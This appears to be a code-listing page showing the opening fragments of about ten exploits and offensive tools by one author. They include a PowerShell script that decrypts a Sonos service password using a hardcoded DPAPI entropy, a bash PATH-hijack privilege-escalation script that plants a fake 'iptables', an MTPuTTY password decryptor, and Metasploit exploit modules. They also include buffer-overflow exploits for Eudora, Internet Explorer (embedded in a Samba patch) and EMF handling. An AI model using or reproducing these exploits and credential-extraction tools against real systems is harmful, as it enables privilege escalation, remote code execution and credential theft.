ykoster

# load System.Security for HMAC-SHA256
Add-Type -AssemblyName System.Security

$ip = "127.0.0.1"
$port = 3445
$configPath = "$env:ProgramData\Sonos,_Inc\runtime\ShareConfig.xml"
$sharePath = "$env:windir\media"

# the entropy value is hardcoded in the service and used for encrypting and decrypting the password of the Sonos user (DPAPI)
$entropy = [System.Text.Encoding]::Unicode.GetBytes("e51bd1fb-2783-4261-95b8-027afc69e8af");

ykoster

#!/bin/bash

OLDPATH=$PATH
trap cleanup EXIT
export PATH=.:$PATH

/bin/cat > $HOME/iptables << __EOF
#!/bin/bash
/bin/su -c /usr/bin/xterm
__EOF

ykoster

/* ---------------------------------------------------------------------
 * mordan.c
 * revision 0.4
 * ---------------------------------------------------------------------
 * November 2005, Yorick Koster, ITsec Security Services
 * ---------------------------------------------------------------------
 * Mordan is a program that can be used to determine the internal state
 * of the java.util.Random() random number generator. In order to do so,
 * mordan requires two integer values (created with Random.nextInt())
 * or one long value (created with Random.nextLong()).

ykoster

<#
 .Synopsis
  Decrypt an MTPuTTY configuration file

 .Description
  Read an MTPuTTY configuration file, decrypt the passwords and dump the result

 .Parameter ConfigFile
  Path to the MTPuTTY configuration file

ykoster

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::SMTPDeliver

	def initialize(info = {})
		super(update_info(info,
			'Name'			=> 'Evolution TNEF Attachment decoder plugin directory traversal and buffer overflow vulnerabilities',
			'Description'		=> %q{

ykoster

#!/bin/bash

pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`

trap cleanup INT

ykoster

--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O	Fri May 21 21:18:14 2004
+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c	Sat Jun 12 18:26:37 2004
@@ -28,6 +28,450 @@
 #undef DBGC_CLASS
 #define DBGC_CLASS DBGC_RPC_PARSE
 
+/*
+ * Exploit code for "Microsoft's Explorer and Internet Explorer long 
+ * share name buffer overflow" discovered by Rodrigo Gutierrez.
+ * $rev 1.5, Yorick Koster, June 12, 2004

ykoster

/*
* Summary  : Eudora 5.2.1 has a remotely exploitable buffer overflow
*            This vulnerability can be exploited by spoofing an attachment
*            that has an overly long filename. An overly long filename will
*            cause ECX to be overwritten, this value is later used in EIP,
*            thus allowing the execution of arbitrary code.
*            Note that the filename must begin with a backslash character
*            in order to trigger the buffer overflow. Dot characters are
*            not needed, but will trigger the buffer overflow sooner
*

ykoster

/* -----------------------------------------------------------------------------
 * Enhanced Meta File arbitrary memory access vulnerability
 * Revision 0.1, Yorick Koster, November 5th, 2004
 * -----------------------------------------------------------------------------
 * Summary:
 * ---------
 * An memory access flaw has been discovered in the 
 * GetEnhMetaFilePaletteEntries() [1] function. This flaw can be used to crash
 * programs that call this function. Furthermore, it is also possible to copy
 * arbitrary parts of memory into a buffer that is passed to the

ykoster

##
# run 'rundll32 dfshim CleanOnlineAppCache' to clear ClickOnce cache
##

require 'msf/core'
require 'base64'
require 'digest/sha1'

class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking